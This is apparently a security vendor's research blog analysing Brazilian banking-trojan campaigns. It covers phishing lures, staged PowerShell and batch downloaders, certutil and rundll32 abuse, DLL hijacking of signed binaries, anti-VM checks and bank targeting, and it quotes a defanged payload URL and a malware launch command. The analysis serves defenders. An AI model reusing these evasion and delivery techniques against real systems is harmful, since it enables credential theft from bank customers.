Research by: Assaf Dahan and Joakim Kandefelt
For more than a decade, Brazil has been considered a major contributor to global cybercrime. Countless security reports have detailed a plethora of nefarious activities linked to Brazilian threat actors, who mainly target the financial and private sector. Brazil is particularly known for being home to huge botnets that send out spam and phishing emails and proliferate infostealers and banking Trojans. After India and China, Brazil is the world's third worst botnet infected country, according to The Spamhaus Project.
In 2018, Cybereason’s Nocturnus team analyzed numerous campaigns related to several Brazilian financial malware. This blog shows the pervasiveness of these Brazilian-made malware, which target online banking customers of over 60 banks in nearly a dozen countries throughout Latin America, Spain and Portugal. This blog continues research presented in our earlier blog and maps the evasive infection and delivery methods used by Brazilian threat actors in order to distribute malware.
The campaigns, which target customers of more than 60 banks worldwide, deliver different kinds of financial malware. Antivirus vendors have assigned this type of malware generic names like: Banload, Banbra, Bancos, Boleto, Delf and Spy.Banker. Despite the variation in the final malware payload, Cybereason identified three key stages that were common to most of the attacks involving Brazilian financial malware.
The multi-stage delivery infrastructure helps attackers to minimize the risk of detection. By implementing various evasive techniques, the attackers successfully bypass signature/heuristic-based engines, thus ensuring the delivery of the final malware. While the multi-stage delivery approach is not new in cybercrime, its adoption by Brazilian threat actors has proven to be highly effective at evading many anti-virus products, as demonstrated by the low detection rate presented in our research.
In each stage, we observed commonalities in the tools, techniques and procedures (TTPs) that are shared across campaigns. These TTPs include:
Our research revealed interesting aspects of the Brazilian malware ecosystem. We observed different types of Brazilian malware being used in conjunction by the same threat actor. In some of the endpoints infected with Brazilian financial malware, we noticed additional Brazilian-made malware, such as infostealers, cryptocurrency miners and a malware that steals data from Microsoft Outlook. This finding gives us a glimpse into the different ways in which threat actors can capitalize on previously gained foothold, in order to increase their potential profits.
Discussing Brazilian financial malware may imply that this threat only targets Brazilian online banking customers, but our research clearly shows that Brazilian threat actors have expanded their operation to Spanish-speaking countries in Latin America and Spain.
Based on the data from recent campaigns, Spain is the most second targeted country after Brazil. Other countries targeted in recent campaigns include Mexico, Argentina, Venezuela, Colombia, Bolivia and Chile.
Our research demonstrates how different types of Brazilian-made malware, originally designed to target Brazilian banking users, were repurposed to target other countries and their respective regional banks. We observed references to more than 60 banks embedded within the malware's code. (See the list of targeted banks in this section).
Cybereason analysts were able to trace the origin of various Brazilian malware to a Remote Access Tool (RAT), whose source code is publicly available on Github. While the identity of the author is known, there is no proof that this author has a direct link to the financial malware discussed in this blog. Cybereason estimates that the publicly-available source code was repurposed by different threat actors who later added banking modules as well as anti-analysis features, that were present in the financial malware analyzed in this blog.
Table of Contents
Over the course of 2017-2018, Cybereason observed many variations to the infection flow. However, there seems to be a basic formula that most infections adhere to:
Infection Vector: The infection chain starts with a phishing email masquerading as a legitimate business invoice. The email body usually contains either a link or an attachment (pdf, zip, batch script, html) that will fetch or run the first stage downloader.
Stage 1 - Downloader: An obfuscated script or downloader command (.cmd, .lnk, .vbs, .js) is used to download the second stage payload. The downloader often points to a shortened URL that redirects to a Web hosting service, dynamic DNS or CDN to fetch the second stage payload.
Stage 2 - Downloader: Mostly an obfuscated PowerShell script that downloads the main payload. In some cases the second stage downloader has additional functionality, such as creating persistence and performing anti-analysis checks.
Stage 3 - Main Payload: Main malware payload that steals online banking data from the targeted banks found in the malware configuration. The configuration is either embedded in the binary or downloaded from a command-and-control server. Most payloads are Windows executable binaries, developed in Delphi.
During our analysis of these campaigns, Cybereason observed many legitimate services that the threat actors chained together to deliver financial malware. These services include several URL shorteners, Dynamic DNS, online storage services, and CDNs (Brazilian threat actors have been known to use CDNs to deliver malware).
Using these different services together makes the generated network traffic appear legitimate, increasing the chances that it won’t be flagged by IOC/heuristic-based engines. This technique seems to bypass many network security products, antivirus programs and may even evade some security analysts.
Example 1: Multi-stage delivery as observed in network traffic
URL Shortener → Dropbox → URL Shortener → Facebook CDN → Malicious Site/C2 Gate
Example 2: Multi-stage delivery as observed in network traffic
URL Shortener → Dynamic DNS → URL Shortener → Github → Malicious Site/C2 Gate
Table of common services being used as part of the threat actor’s infrastructure
|URL shorteners||goo.gl, bit.ly, tinyurl.com, bit.do|
|Online storage||dropbox.com, sendspace.com, gitlab.com, github.com, amazonaws.com,000webhostapp, pastebin.com, googleusercontent.com|
|CDNs||cdn77.org, cdn.fbsbx.com (Facebook’s CDN)|
|Dynamic DNS||publiccloud.com.br, ddns.net, game-server.cc (dyndns), hopto.org, no-ip.org|
Example of first stage payload hosted on Gitlab:
The extracted content is an obfuscated .cmd scriptlet with a very low detection rate:
Cybereason found that phishing emails were used for the initial infection. The email body usually contains either an attachment or a link to a URL shortener that points to hosting websites where the first stage payload is stored. The payloads often masquerade as Flash/Java updates.
Most emails share a similar subject line and allege to be invoices (“FATURA” in Portuguese). Another common theme is spoofing emails to make them look like they came from VIVO, Brazil’s largest telecommunications company.
Example 1: Spoofed VIVO Emails and Fake Invoices
The infection chain starts after the user opens the PDF attached to the spoofed email:
Examination of the PDF reveals a stream containing a shortened URL:
Once the user clicks anywhere on the PDF, the code will fire a request to the shortened URL, which at the time of the detection had zero antivirus detections:
The URL resolves to the following DropBox URL that hosts a ZIP file containing the first stage downloader script:
File name: 2Via-Fatura-13082018.zip
Example 2: .lnk file downloaded from a Web-hosting website
In one recently observed campaign, the victims were led to this file sharing website URL and encouraged to download a ZIP file:
The ZIP file holds a .lnk file (arq1561.lnk) that contains an obfuscated downloader payload:
Once users click on the .lnk file, it spawns cmd.exe and powershell.exe processes, which download a secondary payload:
Additionally, an Internet Explorer instance launches and loads a legitimate Adobe website, probably to allay any suspicions that the users have about the downloaded file and to distract them from what’s going on in the background:
In 70 percent of the infections, the infection chain traces back to three main file extensions: .bat, .cmd and .lnk. The scripts are usually contained in an archive (.rar/.zip) to bypass email and spam filters. In addition to the batch files, we also observed other extensions, such as .exe (Windows Executable) and .chm (compiled HTML), sent over as email attachments.
The combination of downloaders bundled in archives proved to be highly effective at bypassing antivirus products. Many of the analyzed payloads had a low detection rate, ranging between 0-17, out of 59 antivirus vendors.
Most of the first stage payloads consisted of an obfuscated script or a set of obfuscated commands. The batch script below uses an obfuscation that gradually builds up its payload, as detailed in this blog. The PowerShell payload is set as an Environment Variable (in this case the variable is called “system”):
This obfuscation type appears to be adopted from Daniel Bohannon’s Invoke-Obfuscation project. Once PowerShell is executed, the actual downloader payload does not appear in the process’ command-line arguments:
PowerShell command-line arguments: -nop -win 1 -
However, by examining the environment variables at runtime, one can observe the downloader command set to the “system” environment variable:
Based on our observations, this technique is widely-used by Brazilian threat actors, and provides yet another testimony to the efforts made by the threat actors to evade both static detection by using obfuscation as well as detection based on command-line logging by using environment variables.
The Brazilian threat actors seem keenly aware of the trendy usage of Microsoft-signed and trusted binaries (aka LOLBins) to download or execute payloads. In addition to the commonly seen PowerShell and Windows script engines, we observed other Microsoft binaries being used across different campaigns.
Example #1: Using msiexec.exe as a Downloader
The above .lnk file spoofs an Internet Explorer shortcut. Once executed, a secondary payload is downloaded, extracted and executed using Microsoft’s msiexec.exe:
The shortened URL resolves to the following URL (FaceBook's CDN):
The downloaded payload is an msiexec file, which serves as a container that deploys the “windows.bat” in %appdata%:
Contents of the batch file:
The deobfuscated payload is the following PowerShell downloader command stored in an environment variable (“day”):
This downloader fetches another PowerShell payload, which ultimately drops the main payload.
Example #2: Using Certutil as a Downloader
The above RAR archive contains a .lnk file, which upon execution will download a payload using Microsoft’s Certutil.exe with the “-URLCache” and “-f” flags:
The executed command will download and launch a batch file (secondary downloader):
Example #3: Using Certutil to base64 Payloads
We observed a .lnk file that included the following command, which uses Microsoft’s Certutil to decode a base64 payload:
The decoded payload is further obfuscated with simple caret obfuscation (^):
The deobfuscated command downloads a secondary payload:
Our investigation showed variation in the types of second stage downloaders across different campaigns. The main purpose of the second stage downloaders is to fetch an additional payload, in many cases the main payload. Some secondary downloaders showed additional capabilities, such as persistence creation, UAC bypass and anti-research checks.
Example #1: Persistence and fetching secondary payload
The following second stage downloader is a PowerShell script that checks for an existing infection, drops a batch file that checks for values in the registry, drops a .lnk file that points to the aforementioned batch file for persistence and fetches a secondary xor-encrypted payload from the same remote server. The script has low detection rate (3/54):
Initially, the script checks for a likely previous infection by searching for a file name with the day’s date (in the form of yyyymmdd) in the %temp% directory and, if this file is unavailable, it downloads a bitwise XOR-encrypted payload:
The full batch file script is built dynamically by the PowerShell script. Here we see it being built with environment variables as seen in other instances throughout the different campaigns.
The .lnk file is created via Windows Script Host (commonly referred to as Wscript) and is used for persistence, as it will point to the batch file when executed (the $cmdFileName variable contains the path to the batch file) :
The script uses a scheduled task to bypass UAC (User Account Control). The created batch file is executed once, and then the task is deleted to remove as much evidence as possible:
Contents of batch file:
Example #2: Obfuscated Downloader with Anti-Virtual Machine Checks
While analyzing an incident, we found the following PowerShell script, which looked different from the previous downloader. The script was likely obfuscated by the ISESteroids PowerShell extension, which provides a built-in obfuscation feature. The script had a particularly low detection rate (2/57):
After deobfuscating the script, this downloader conducted a few anti-virtual machine checks. These checks are part of the threat actors’ evasion techniques and attempt to prevent researchers from studying the main payload. As seen below, the script will attempt to use WMI to query for these virtualization products: VirtualBox, VMware Virtual Platform, Virtual Machine, HVM DOMU:
Once the “coast is clear”, the script will create persistence via a .lnk file, which will execute the malware via Rundll32.exe.
The campaign’s main payloads consisted mostly of common Brazilian malware that antivirus vendors generically name Banload, Banbra, Bancos, Boleto, Delf and Spy/Banker. Brazilian financial malware is known for its effectiveness in overcoming multi factor authentication (MFA), by implementing sophisticated social-engineering tricks to extract SMS codes and other security tokens information, using overlay screens as previously shown.
Cybereason identified variations in the way that the main payloads were executed. In this part, we will examine executions that involve abuse of trusted third-party applications via DLL hijacking as well as using built-in Microsoft-signed binaries (also known as “LOLBins”) to execute the malware code. Using these techniques lowers the risk of detection.
As discussed in an earlier blog, the Brazilian threat actors seem quite fond of leveraging DLL-hijacking techniques against trusted security vendors, including Avira and McAfee, and trusted technology companies like VMware, NVIDIA, HP, Realtek and Adobe.
We noticed that the Brazilian threat actors evolved how they implemented DLL-hijacking. Earlier infections that used this technique implemented a classic approach of deploying a vulnerable trusted binary along with a fake DLL. This TTP was previously documented being used in the context of Brazilian financial malware. In some cases, the fake DLL was even signed with revoked or self-signed certificates in an attempt to further lower the possibility of detection.
Newer samples observed in 2017 and 2018 added another layer of evasion by splitting the malware payload into two components:
This codependency between the loader and the encrypted payload makes the detection and analysis of this malware harder. For the malware to run, it requires that both files reside in the same folder. In most cases, the loader DLL will also validate that it is running in the context of the vulnerable application, or else it will crash.
Example #1: Remoto Overlay RAT Abusing Avira via DLL Hijacking
An email attachment sent to a user contained a .lnk file, which executed the following commands that led to a download of a binary (reymr.exe):
The binary is a signed Avira product renamed by the attackers, as indicated by the file metadata. See this VirusTotal link for more information:
Further investigation showed that along with reymr.exe, the PowerShell script also dropped the following files:
|reymr.exe||Legitimate Avira.SystrayStartTrigger signed binary||762BF93E6265B4E74BD0BFCAA447F1A619DB2F58|
|msvcr120.dll||Legitimate Microsoft® C Runtime Library||F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1|
|msvcp120.dll||Legitimate Microsoft® C Runtime Library||EFD1E306C1092C17F6944CC6BF9A1BFAD4D14613|
|avira.oe.nativecore.dll||Malicious DLL exploiting Windows Search order Hijacking to execute malware. Decrypts the contents of RestartManagerUninstall.mui||312F4DC26FD0C277F9727CE3B943123CBEB127C1|
|RestartManagerUninstall.mui||Encoded blob loaded after avira.oe.nativecore.dll with Trojan functionality||9A944B0933F004DB012DB202BF5C2BE1E231FBB5|
Reymr.exe includes avira.oe.nativecore.dll in its import table:
The main payload was identified as the Remote Overlay RAT, previously discussed here.
In some recent spam campaigns that we monitored, the malware authors favored the built-in Rundll32.exe to launch the loader DLL payload. Once the DLL is executed, it will load and decrypt a second (sometimes even a third) encrypted binary, which is the malware main payload.
Example #1: Financial Trojan launched by Rundll32
In this example, we can see a PowerShell process that was spawned by cmd.exe as a result of a .lnk file execution. PowerShell downloads a secondary payload from a malicious website:
Download URL: hxxp://barca21[.]zapto[.]org/barca21/vx1.txt
The PowerShell payload drops and extracts a ZIP file containing the following files:
|Yaew.toib||Loader binary (DLL)||3F9E9BD8330660B0DA23EE8D54787A44E53DDF65|
|Yaew1.toib||Encrypted financial Trojan payload (DLL). Exported function: OCSVFWBO56||87DBACFE8727B9DA1EACE101BEE84D06388FA7B6|
|G||Encryption & configuration data||D5E3969BB36A675CF9CE60A88ABB5C8DE7C3BD80|
"C:\Windows\System32\rundll32.exe" C:\Users\Public\YAEW.TOIB ,,, OCSVFWBO56
The unpacked payload seems to be a variant of a Brazilian Remote Overlay RAT:
Example #2: Rundll32 injecting Main Payload to Windows Media Player
In this example, we will follow the execution starting from the second stage PowerShell downloader:
The network PCAP shows a second stage PowerShell that downloads a ZIP file (PK signature):
The zip file contains OAzBrxSXRoTOBssa.dll and OAzBrxSXRoTOBssa.
List of dropped files:
|1010180844353.bmp||Zip (dropped by PowerShell)||3344EF3B32DF03057721ED6E76F276B9073A0932|
|OAzBrxSXRoTOBssa.dll||Malware loader exported function: dGuCCzlxnosaJBpk||C523C65C7BD9EE09360C24BC706985BA5361D724|
The PowerShell script extracts its contents and runs the DLL via rundll32.exe, pointing to the exported function “dGuCCzlxnosaJBpk”:
Once the loader decrypts the main payload (OAzBrxSXRoTOBssa), it injects the malicious code to Windows Media Player:
The Injected PE (MZP header) is mapped into the memory space of Windows Media Player:
The dumped payload shows indications that the malware was likely compiled on a machine with Brazilian Portuguese language settings, as can be found in the the RC_DATA resource section:
Once executed, the malware sends an initial beacon via a POST request to the command-and-control server:
Other Brazilian malware that was related to the malware we analyzed was also found on the compromised machines. These post-infection payloads provide a glimpse into the Brazilian malware ecosystem and, to some extent, offer an understanding of what the threat actors are after.
In addition to the banking Trojans, we found that the same campaigns were distributing cryptocurrency miners, infostealers and malware that targets Microsoft Outlook. Malware that targets Outlook is a particular concern since it poses a major risk to organizations worldwide. The malware contains features that leverage Outlook’s functions, like the ability to query victims’ contact lists. Threat actors usually use this information for spam campaigns, but can also sell it on the dark market to other attackers who want information on an organization they’re planning to attack.
Following is an example of a malware which was designed to steal credentials using Overlay phishing, as well as downloading additional malware. The malware and its auxiliary components were found in %programdata%:
|Rltkapo32.exe||Renamed authentic Microsoft’s Certmgr.exe||F18EEBAEA4460B057F5B49E8239779F1C0C05BB9|
|Cryptui.dll||Fake DLL, serves as a loader and injector||D3AE2843261528D8B4A5D6070661FE302E7A1FA9|
|Borlndmm.dll||Legitimate Delphi Borland Library||76E3A2004E5BA7F5126FAC9922336F38E928D733|
As seen before, Brazilian threat actors often exploit DLL hijacking, and this time the vulnerable application was Windows’ “certmgr.exe” (aka, Certificate Manager Tool). The fake DLL (cryptui.dll) loaded and injected to svchost.exe the main malware payload (Rltkapo32.driver):
Examination of svchost's injected payload, shows that the Delphi malware will try to present a fake Login form to its victims, in order to steal their credentials (possibly even organizational credentials):
The injected svchost process communicates with the C2 servers and downloads a second payload :
Mathilde.exe, SHA-1: 15166EF05CB3278E388C46359835A64CFB4D29EC
Examination of the dumped injected payload, shows that the Delphi malware will try to present a fake Login form to its victims, in order to steal their credentials (possibly even organizational credentials):
Mathilde.exe is an SFX file which extracts a script called “linsoldo.cmd”, which is a PowerShell downloader:
The script fetches an Outlook stealer PowerShell script hosted on an Amazon S3 bucket.
The downloaded PowerShell script (“Outpos.data“) is designed to steal information from Microsoft Outlook clients and users’ harvest emails addresses. Its main capabilities:
Excerpt from the PowerShell script shows the exfiltration data:
Also interesting to notice the comments in Portuguese left by the malware’s Author:
The data is posted to a server (18.104.22.168), running a server that runs XAMPP. The error message, we can see an admin panel referencing the name “coringa”, as can be seen below:
“Coringa” is likely a reference to a Brazilian RAT called “Coringa-RAT”, whose source code is publicly available. It is likely that the threat actors are using the RAT in other campaigns as well. Cybereason, however, did not observe a direct use of Coringa-RAT in the aforementioned campaigns.
The URL from which the Outlook malware was downloaded points to an Amazon S3 Bucket:
The bucket contains several kinds of Brazilian malware, such as: second stage downloaders, Outlook mail stealer and also a Brazilian banking trojan (Remote Overlay RAT):
|outpos.data||Outlook mail stealer (PowerShell script)||0657FAA51EB8417A2D63388A9BA37997A2B5F323|
|image2.png||Zip file contains vulnerable NVIDIA binary and Brazilian financial malware||
|Poratal.txt / Testefad.txt||PowerShell Downloader||E138609B66FC6B9C6C688DE6B5DC094A782C6474|
The unpacked payload of the Remote Overlay RAT shows that the malware targets Brazilian banks such as: CitiBank Brasil, Safra National Bank, Banco da Amazonia, Itau Brasil and Bradesco:
Cybereason analyzed multiple infections involving different Brazilian financial malware that did not target Brazilian bank users. Instead, the malware configuration was set to target bank users in Latin America and Spain. This finding bodes well with earlier research papers that discuss various aspects of Brazilian cybercrime’s role in the global threat landscape and its proliferation to various regions. Research from ESET, TrendMicro, Kaspersky and ElevenPath has more details on that topic.
The following examples, taken from infections that occurred in 2018, show that online bank users in Spanish-speaking countries are also being targeted. These countries include Argentina, Bolivia, Chile, Venezuela and Spain. Cybereason found earlier samples of Brazilian malware targeting more countries, such as Mexico, Portugal, Colombia and other Latin American countries.
Example #1: Brazilian Financial Malware targeting bank customers in Latin America and Spain
Example #2: Brazilian Spammer / Info-Stealer targeting Venezuela & Bolivia
Bancaribe, Banco Fondo Común (BFC), Banco Exterior, Banco Sofitasa, BBVA Provincial, Banco Universal, Banco Industrial de Venezuela, Banesco Banco Universal, Banco Caroní, Banco Venezolano de Crédito, Banco Nacional de Crédito, El Banco Federal
Example #3: Brazilian Banker Targeting Argentinian Users
Extracted image from the malware resource, shows an overlay screen meant to bypass Multi-Factor Authentication, targeting customers of Bank of Patagonia:
List of Argentinian banks targeted by the Brazilian malware:
Banco Patagonia, Itaú Argentina, Standard Bank Argentina, Banco Macro, Industrial and Commercial Bank of China (Argentina), Santander Rio
During our investigation, it was evident that the different malware types were created by Portuguese-speaking threat authors and were originally designed to target Brazilian users. This is supported by the embedded Portuguese strings and references to specific security softwares that belong to Brazilian banks, as can be seen below:
Command & Control instructions in Portuguese:
List of commands embedded in the malware’s code shows Portuguese strings:
Excerpt from UAC-bypass procedure used by the malware (“not possible to verify UAC”):
Strings referencing specific software distributed by Brazilian banks to enhance online banking safety, such as: G-buster Plugin (GbPlugin), Aplicativo Bradesco and Aplicativo Itau.
Based on the functionality and string similarity, Cybereason estimates that different kinds of Brazilian malware borrowed code or even based on the source code of a Remote Access Tool (RAT) called “Delphi Remote Access PC”. The RAT is open-source and publicly available on Github. It was coded in 2015 by a Brazilian user whose Internet handle is “senjaxus”. This user also co-coded another RAT called AllaKore. The author clearly states that he is not responsible for any misuse of his code:
“This source was created by Richard Maickonn. Distribution of this source is free!Contact: senjaxus[at]gmail.com.
I AM NOT RESPONSIBLE FOR THE MISUSE OF THIS SOURCE.”
Even though the code has fully functional remote access capabilities, it does not seem to contain functionality directly related to financial malware, namely, targeting of banks or using a screen overlay social engineering. In addition, unlike typical Brazilian financial malware, the Github source code does not contain anti-analysis code, like the ability to detect virtual machines, security products or Brazilian software. It is our estimation that these features were likely added by different malware authors who repurposed the open-source RAT code.
Examples of code similarity between the Github source code and other Brazilian malware payloads:
Example #2: Brazilian malware targeting Chilean Bank Users
Example #3: MPRado Remote Access Tool
This RAT seems heavily based on the source code of Delphi Remote Access PC. This is likely a variant of the RAT:
In this blog, we surveyed the techniques used by Brazilian threat actors as observed by Cybereason throughout 2017-2018. We also showed how different financial malware campaigns share similar traits around delivery methods. The analysis of the tools and techniques highlights how effective these methods are at evading antivirus products, as demonstrated repeatedly by the low detection rate. In addition, we showed how Brazilian threat actors are expanding their campaigns and targeting online banking users across Latin American countries as well as Spain. Finally, we linked several payloads to an open-source RAT that was created by a Brazilian author whose code was likely repurposed and turned into various banking trojans by Brazilian threat actors.